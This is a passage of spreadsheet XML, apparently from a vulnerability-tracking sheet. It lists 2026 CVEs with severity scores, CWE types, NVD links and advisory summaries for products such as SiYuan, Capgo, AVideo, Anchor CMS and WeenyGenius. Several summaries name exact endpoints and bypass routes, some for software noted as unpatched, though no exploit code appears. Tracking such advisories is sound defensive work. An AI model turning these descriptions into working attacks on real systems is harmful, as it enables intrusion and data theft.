          <t>SiYuan versions &lt;= 3.8.1 contain an incomplete fix for CVE-2026-32767 (GHSA-j7wh-x834-p3r7). The prior fix (commit d5e2d0bc) added an administrator check for SQL mode (method=2) in POST /api/search/fullTextSearchBlock, but the endpoint still does not enforce the application's read-only boundary: for method=2 it forwards caller-supplied SQL to the blocks database query path without calling model.CheckReadonly or CheckReadonlyStatementInBox. As a result, when a workspace runs in read-only mode (--readonly=true), an authenticated administrator can submit arbitrary SQL through /api/search/fullTextSearchBlock and obtain raw read access to the blocks database, even though the dedicated /api/query/sql endpoint is blocked in that mode. Fixed in v3.8.2.</t>
        </is>
      </c>
      <c r="M1353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87808</t>
        </is>
      </c>
    </row>
    <row r="1354">
      <c r="A1354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87816</t>
        </is>
      </c>
      <c r="C1354" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1354" s="5" t="inlineStr"/>
      <c r="F1354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1354" s="5" t="inlineStr"/>
      <c r="H1354" s="5" t="inlineStr"/>
      <c r="I1354" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1354" s="5" t="inlineStr"/>
      <c r="K1354" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L1354" s="5" t="inlineStr">
        <is>
          <t>PasswordPusher before 2.11.1 contains a time-of-check-to-time-of-use race condition in view limit enforcement that allows unauthenticated attackers to bypass expire_after_views limits. Attackers can send concurrent requests to the show endpoint to access one-time secrets multiple times before the view count is incremented and the push expires.</t>
        </is>
      </c>
      <c r="M1354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87816</t>
        </is>
      </c>
    </row>
    <row r="1355">
      <c r="A1355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="C1355" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1355" s="5" t="inlineStr"/>
      <c r="F1355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1355" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1355" s="5" t="inlineStr"/>
      <c r="I1355" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1355" s="5" t="inlineStr"/>
      <c r="K1355" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1355"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M1355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="1356">
      <c r="A1356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="C1356" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1356" s="5" t="inlineStr"/>
      <c r="F1356" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1356" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1356" s="5" t="inlineStr"/>
      <c r="I1356" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1356" s="5" t="inlineStr"/>
      <c r="K1356" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1356"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M1356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87819</t>
        </is>
      </c>
    </row>
    <row r="1357">
      <c r="A1357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87822</t>
        </is>
      </c>
      <c r="C1357" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1357" s="5" t="inlineStr"/>
      <c r="F1357" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1357" s="5" t="inlineStr"/>
      <c r="H1357" s="5" t="inlineStr"/>
      <c r="I1357" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1357" s="5" t="inlineStr"/>
      <c r="K1357" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1357" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 fail to validate centroid means during deserialization in MergingDigest.fromBytes, allowing attackers to inject NaN values that bypass validation checks. Attackers can craft malicious serialized digests containing NaN centroids that degrade sorting performance from O(n log n) to O(n squared), causing severe processing delays during merge operations.</t>
        </is>
      </c>
      <c r="M1357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87822</t>
        </is>
      </c>
    </row>
    <row r="1358">
      <c r="A1358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87824</t>
        </is>
      </c>
      <c r="C1358" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1358" s="5" t="inlineStr"/>
      <c r="F1358" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1358" s="5" t="inlineStr"/>
      <c r="H1358" s="5" t="inlineStr"/>
      <c r="I1358" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1358" s="5" t="inlineStr"/>
      <c r="K1358" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1358" s="5" t="inlineStr">
        <is>
          <t>zstd-jni before 1.5.7-14 fails to validate the samples buffer capacity in Zstd.trainFromBufferDirect, allowing attackers to read past buffer boundaries by supplying oversized per-sample lengths. Attackers can trigger out-of-bounds memory access by providing crafted sample length arrays that cause the native implementation to walk past the buffer allocation, resulting in JVM termination.</t>
        </is>
      </c>
      <c r="M1358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87824</t>
        </is>
      </c>
    </row>
    <row r="1359">
      <c r="A1359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87962</t>
        </is>
      </c>
      <c r="C1359" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1359" s="5" t="inlineStr"/>
      <c r="F1359" s="5" t="inlineStr"/>
      <c r="G1359" s="5" t="inlineStr"/>
      <c r="H1359" s="5" t="inlineStr"/>
      <c r="I1359" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1359" s="5" t="inlineStr"/>
      <c r="K1359" s="5" t="inlineStr">
        <is>
          <t>CWE-1284</t>
        </is>
      </c>
      <c r="L1359" s="5" t="inlineStr">
        <is>
          <t>t-digest versions 3.1 through 3.3 contain a denial of service vulnerability in MergingDigest.fromBytes that fails to validate length and capacity fields from serialized data. Attackers can supply crafted serialized digests with mismatched header fields to trigger ArrayIndexOutOfBoundsException or NegativeArraySizeException, aborting the parsing thread.</t>
        </is>
      </c>
      <c r="M1359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87962</t>
        </is>
      </c>
    </row>
    <row r="1360">
      <c r="A1360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87995</t>
        </is>
      </c>
      <c r="C1360" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1360" s="5" t="inlineStr"/>
      <c r="F1360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1360" s="5" t="inlineStr"/>
      <c r="H1360" s="5" t="inlineStr"/>
      <c r="I1360" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1360" s="5" t="inlineStr"/>
      <c r="K1360" s="5" t="inlineStr">
        <is>
          <t>CWE-1021, CWE-79</t>
        </is>
      </c>
      <c r="L1360" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.8.11 until 0.11.1, src/lib/components/chat/FileNav/PortPreview.svelte rendered terminal port content in an iframe sandbox containing both allow-scripts and allow-same-origin. Because the terminal proxy serves that content from the Open WebUI origin, an authenticated user with access to a shared terminal server could host script on a previewed port and take over a victim's account when the victim opened the preview. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="M1360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87995</t>
        </is>
      </c>
    </row>
    <row r="1361">
      <c r="A1361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88260</t>
        </is>
      </c>
      <c r="C1361" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1361" s="5" t="inlineStr"/>
      <c r="F1361" s="5" t="inlineStr"/>
      <c r="G1361" s="5" t="inlineStr"/>
      <c r="H1361" s="5" t="inlineStr"/>
      <c r="I1361" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1361" s="5" t="inlineStr"/>
      <c r="K1361" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-288</t>
        </is>
      </c>
      <c r="L1361" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass using an alternate path or channel and Improper validation of syntactic correctness of input vulnerability in Brainzcompany Zenius EMS 8.0 allows Remote Code Inclusion.
This issue affects Zenius EMS 8.0: through OAM (Build 109).</t>
        </is>
      </c>
      <c r="M1361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88260</t>
        </is>
      </c>
    </row>
    <row r="1362">
      <c r="A1362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88861</t>
        </is>
      </c>
      <c r="C1362" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1362" s="5" t="inlineStr"/>
      <c r="F1362" s="5" t="inlineStr"/>
      <c r="G1362" s="5" t="inlineStr"/>
      <c r="H1362" s="5" t="inlineStr"/>
      <c r="I1362" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1362" s="5" t="inlineStr"/>
      <c r="K1362" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="L1362" s="5" t="inlineStr">
        <is>
          <t>Capgo (Cap-go/capgo.app) contains an authentication bypass affecting all versions (no patched version available at time of publication). The Edge authorization path allows a password-only Supabase aal1 session to exercise privileged RBAC permissions even when the account has a verified MFA factor that has not been used for the session: the Edge JWT middleware (foundJWT() in supabase/functions/_backend/utils/hono_middleware.ts) accepts the JWT without validating its assurance level, and the direct RBAC path (checkPermission()/checkPermissionPg() in supabase/functions/_backend/utils/rbac.ts calling public.rbac_check_permission_direct()) authorizes by user ID without passing or checking the session aal, unlike the public.verify_mfa() control which correctly requires aal2. An attacker who knows only the victim's password can therefore authenticate, mint a persistent app-scoped app_admin API key that remains valid after the aal1 session is logged out, and perform privileged operations such as modifying production OTA channel configurations (validated by changing a public production channel from bundle 1.0.0 to 1.0.1), defeating the protection provided by MFA.</t>
        </is>
      </c>
      <c r="M1362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88861</t>
        </is>
      </c>
    </row>
    <row r="1363">
      <c r="A1363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88862</t>
        </is>
      </c>
      <c r="C1363" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1363" s="5" t="inlineStr"/>
      <c r="F1363" s="5" t="inlineStr"/>
      <c r="G1363" s="5" t="inlineStr"/>
      <c r="H1363" s="5" t="inlineStr"/>
      <c r="I1363" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1363" s="5" t="inlineStr"/>
      <c r="K1363" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1363" s="5" t="inlineStr">
        <is>
          <t>Capgo (capgo.app) backend through 12.242.4 does not validate parent-child delegation when processing the x-limited-key-id header. checkKeyByIdPg() in supabase/functions/_backend/utils/hono_middleware.ts resolves the attacker-supplied numeric API key ID using only the key ID, its expiration state, and the authenticating key's user_id, while hasLimitedRbacSubkeyScope() accepts any key with a non-organization (e.g., app-scoped) RBAC binding and validateSubkeyUser() only compares owning user IDs. Because Capgo treats API keys as independent RBAC principals with separate role bindings, an authenticated apikey_manager API key with no application access can supply the numeric ID of a more privileged same-owner key and have the middleware replace the authenticated principal and effective API-key secret with that key (setSubkeyAuthContext), exercising an app_admin sibling's permissions without knowing or submitting its secret. The issue was reproduced on release 12.242.4 (commit b3d02cdbc23ac59990785acacd1f113c07458568) after the fix for GHSA-8h52-44r7-w343; at the time of the advisory no patched version was available.</t>
        </is>
      </c>
      <c r="M1363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88862</t>
        </is>
      </c>
    </row>
    <row r="1364">
      <c r="A1364" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88874</t>
        </is>
      </c>
      <c r="C1364" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1364" s="5" t="inlineStr"/>
      <c r="F1364" s="5" t="inlineStr"/>
      <c r="G1364" s="5" t="inlineStr">
        <is>
          <t>nginx</t>
        </is>
      </c>
      <c r="H1364" s="5" t="inlineStr"/>
      <c r="I1364" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1364" s="5" t="inlineStr"/>
      <c r="K1364" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1364" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 (master, 2026-08-23) does not enforce the Live stream password check on the stats endpoint or on the HLS origin. Live::_getStats() (plugin/Live/Live.php) returns a password-protected transmission's RTMP stream key, its isPasswordProtected flag, and its HLS (m3u8) URL to unauthenticated callers, in both the public applications list and the hidden_applications branch used when canSeeLiveFromLiveKey() fails. Separately, the shipped NGINX configuration (deploy/nginx/nginx.conf) serves the .m3u8 playlist, the AES-128 key, and the transport-stream segments from the /live location without any auth_request (the auth_key_check directive in the .key location is commented out). A remote, unauthenticated attacker can therefore retrieve the stream key and decryption key and watch a password-protected live transmission without supplying the configured password. No patched version was available at the time of the advisory.</t>
        </is>
      </c>
      <c r="M1364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88874</t>
        </is>
      </c>
    </row>
    <row r="1365">
      <c r="A1365" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88876</t>
        </is>
      </c>
      <c r="C1365" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1365" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1365" s="5" t="inlineStr"/>
      <c r="F1365" s="5" t="inlineStr"/>
      <c r="G1365" s="5" t="inlineStr"/>
      <c r="H1365" s="5" t="inlineStr"/>
      <c r="I1365" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1365" s="5" t="inlineStr"/>
      <c r="K1365" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1365" s="5" t="inlineStr">
        <is>
          <t>AVideo through revision c3edcc274c389816d434acadac07ee78eaf330c1 contains a missing authorization vulnerability in plugin/PlayerSkins/seo.php that allows unauthenticated attackers to access password-protected video sources by calling getSources() without password validation. Attackers can request the seo.php endpoint with a video ID to obtain the direct MP4 URL and read protected media bytes without supplying the configured password.</t>
        </is>
      </c>
      <c r="M1365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88876</t>
        </is>
      </c>
    </row>
    <row r="1366">
      <c r="A1366" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88893</t>
        </is>
      </c>
      <c r="C1366" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1366" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1366" s="5" t="inlineStr"/>
      <c r="F1366" s="5" t="inlineStr"/>
      <c r="G1366" s="5" t="inlineStr"/>
      <c r="H1366" s="5" t="inlineStr"/>
      <c r="I1366" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1366" s="5" t="inlineStr"/>
      <c r="K1366" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L1366" s="5" t="inlineStr">
        <is>
          <t>OpenPanel share lookup procedures fail to validate access controls and return password hashes and protected report definitions to unauthenticated callers. Attackers with a share link can retrieve argon2id password hashes and full report configurations including event names, filters, and breakdown dimensions for offline password cracking and business intelligence theft.</t>
        </is>
      </c>
      <c r="M1366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88893</t>
        </is>
      </c>
    </row>
    <row r="1367">
      <c r="A1367" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88939</t>
        </is>
      </c>
      <c r="C1367" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1367" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1367" s="5" t="inlineStr"/>
      <c r="F1367" s="5" t="inlineStr"/>
      <c r="G1367" s="5" t="inlineStr"/>
      <c r="H1367" s="5" t="inlineStr"/>
      <c r="I1367" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1367" s="5" t="inlineStr"/>
      <c r="K1367" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1367" s="5" t="inlineStr">
        <is>
          <t>knowns through 0.33.0 exempts the project.set action from permission guard checks unconditionally, allowing read-only agent sessions to bypass restrictions. Attackers can invoke project.set to repoint the server at another project directory and obtain write access capabilities.</t>
        </is>
      </c>
      <c r="M1367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88939</t>
        </is>
      </c>
    </row>
    <row r="1368">
      <c r="A1368" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88959</t>
        </is>
      </c>
      <c r="C1368" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1368" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1368" s="5" t="inlineStr"/>
      <c r="F1368" s="5" t="inlineStr"/>
      <c r="G1368" s="5" t="inlineStr"/>
      <c r="H1368" s="5" t="inlineStr"/>
      <c r="I1368" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1368" s="5" t="inlineStr"/>
      <c r="K1368" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L1368" s="5" t="inlineStr">
        <is>
          <t>Anchor CMS through 0.12.7 fails to enforce role-based access control in admin user-management endpoints, allowing any authenticated low-privilege user to create administrator accounts or modify existing ones. Attackers with editor or user roles can POST directly to admin/users/add or admin/users/edit endpoints to create new administrator accounts or change the existing administrator's password, gaining full administrative access.</t>
        </is>
      </c>
      <c r="M1368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88959</t>
        </is>
      </c>
    </row>
    <row r="1369">
      <c r="A1369" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89146</t>
        </is>
      </c>
      <c r="C1369" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1369" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1369" s="5" t="inlineStr"/>
      <c r="F1369" s="5" t="inlineStr"/>
      <c r="G1369" s="5" t="inlineStr"/>
      <c r="H1369" s="5" t="inlineStr"/>
      <c r="I1369" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1369" s="5" t="inlineStr"/>
      <c r="K1369" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-617</t>
        </is>
      </c>
      <c r="L1369" s="5" t="inlineStr">
        <is>
          <t>libp2p-rendezvous through 0.17.1 fails to validate registration TTL values in discovery responses, allowing attackers to trigger timer arithmetic overflow. A malicious rendezvous server can send a discovery response with an unbounded TTL value that causes the client node process to panic when computing the expiry timer.</t>
        </is>
      </c>
      <c r="M1369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89146</t>
        </is>
      </c>
    </row>
    <row r="1370">
      <c r="A1370" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89147</t>
        </is>
      </c>
      <c r="C1370" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1370" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1370" s="5" t="inlineStr"/>
      <c r="F1370" s="5" t="inlineStr"/>
      <c r="G1370" s="5" t="inlineStr"/>
      <c r="H1370" s="5" t="inlineStr"/>
      <c r="I1370" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1370" s="5" t="inlineStr"/>
      <c r="K1370" s="5" t="inlineStr">
        <is>
          <t>CWE-1088, CWE-400</t>
        </is>
      </c>
      <c r="L1370" s="5" t="inlineStr">
        <is>
          <t>Net-SNMP through 5.9.5.2 contains a denial of service vulnerability in the SMUX module where smux_accept() performs an unauthenticated blocking read without timeout on newly accepted connections. An unauthenticated remote client can connect to the SMUX listener and send no data, causing the single-threaded snmpd main loop to block indefinitely and suspend all SNMP processing.</t>
        </is>
      </c>
      <c r="M1370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89147</t>
        </is>
      </c>
    </row>
    <row r="1371">
      <c r="A1371" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89174</t>
        </is>
      </c>
      <c r="C1371" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1371" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1371" s="5" t="inlineStr"/>
      <c r="F1371" s="5" t="inlineStr"/>
      <c r="G1371" s="5" t="inlineStr"/>
      <c r="H1371" s="5" t="inlineStr"/>
      <c r="I1371" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1371" s="5" t="inlineStr"/>
      <c r="K1371" s="5" t="inlineStr">
        <is>
          <t>CWE-307</t>
        </is>
      </c>
      <c r="L1371" s="5" t="inlineStr">
        <is>
          <t>Smart Video Intercom System developed by Kingdom Communication Associated has a Missing Brute-force Protection vulnerability. Unauthenticated remote attackers can gain access to valid accounts through a large number of login attempts.</t>
        </is>
      </c>
      <c r="M1371" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89174</t>
        </is>
      </c>
    </row>
    <row r="1372">
      <c r="A1372" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1372" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89176</t>
        </is>
      </c>
      <c r="C1372" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1372" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1372" s="5" t="inlineStr"/>
      <c r="F1372" s="5" t="inlineStr"/>
      <c r="G1372" s="5" t="inlineStr"/>
      <c r="H1372" s="5" t="inlineStr"/>
      <c r="I1372" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1372" s="5" t="inlineStr"/>
      <c r="K1372" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1372" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system developed by Howyar Technologies, has a Missing Authentication vulnerability. Unauthenticated attackers on the same network can easily spoof student or teacher endpoints. Impersonating a student can disrupt normal classroom operations, whereas impersonating a teacher can induce student computers to initiate connections, thereby gaining remote control over the student endpoints.</t>
        </is>
      </c>
      <c r="M1372" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89176</t>
        </is>
      </c>
    </row>
    <row r="1373">
      <c r="A1373" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1373" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89177</t>
        </is>
      </c>
      <c r="C1373" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1373" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1373" s="5" t="inlineStr"/>
      <c r="F1373" s="5" t="inlineStr"/>
      <c r="G1373" s="5" t="inlineStr"/>
      <c r="H1373" s="5" t="inlineStr"/>
      <c r="I1373" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1373" s="5" t="inlineStr"/>
      <c r="K1373" s="5" t="inlineStr">
        <is>
          <t>CWE-757</t>
        </is>
      </c>
      <c r="L1373" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has a Use of Insecure Protocol vulnerability. Due to the reliance on ZMTP Null mode, unauthenticated attackers on the same network can capture packets to leak transmitted data, or perform replay attacks with forged commands to disrupt classroom operations.</t>
        </is>
      </c>
      <c r="M1373" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89177</t>
        </is>
      </c>
    </row>
    <row r="1374">
      <c r="A1374" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1374" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89178</t>
        </is>
      </c>
      <c r="C1374" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1374" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1374" s="5" t="inlineStr"/>
      <c r="F1374" s="5" t="inlineStr"/>
      <c r="G1374" s="5" t="inlineStr"/>
      <c r="H1374" s="5" t="inlineStr"/>
      <c r="I1374" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1374" s="5" t="inlineStr"/>
      <c r="K1374" s="5" t="inlineStr">
        <is>
          <t>CWE-940</t>
        </is>
      </c>
      <c r="L1374" s="5" t="inlineStr">
        <is>
          <t>WeenyGenius, a computer lab management system by Howyar Technologies, has an Origin Validation Error vulnerability. Unauthenticated attackers on the same network can spoof the teacher workstation and send broadcast packets, causing student computers to attempt to establish a connection with the attacker.</t>
        </is>
      </c>
      <c r="M1374" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89178</t>
        </is>
      </c>
    </row>
    <row r="1375">
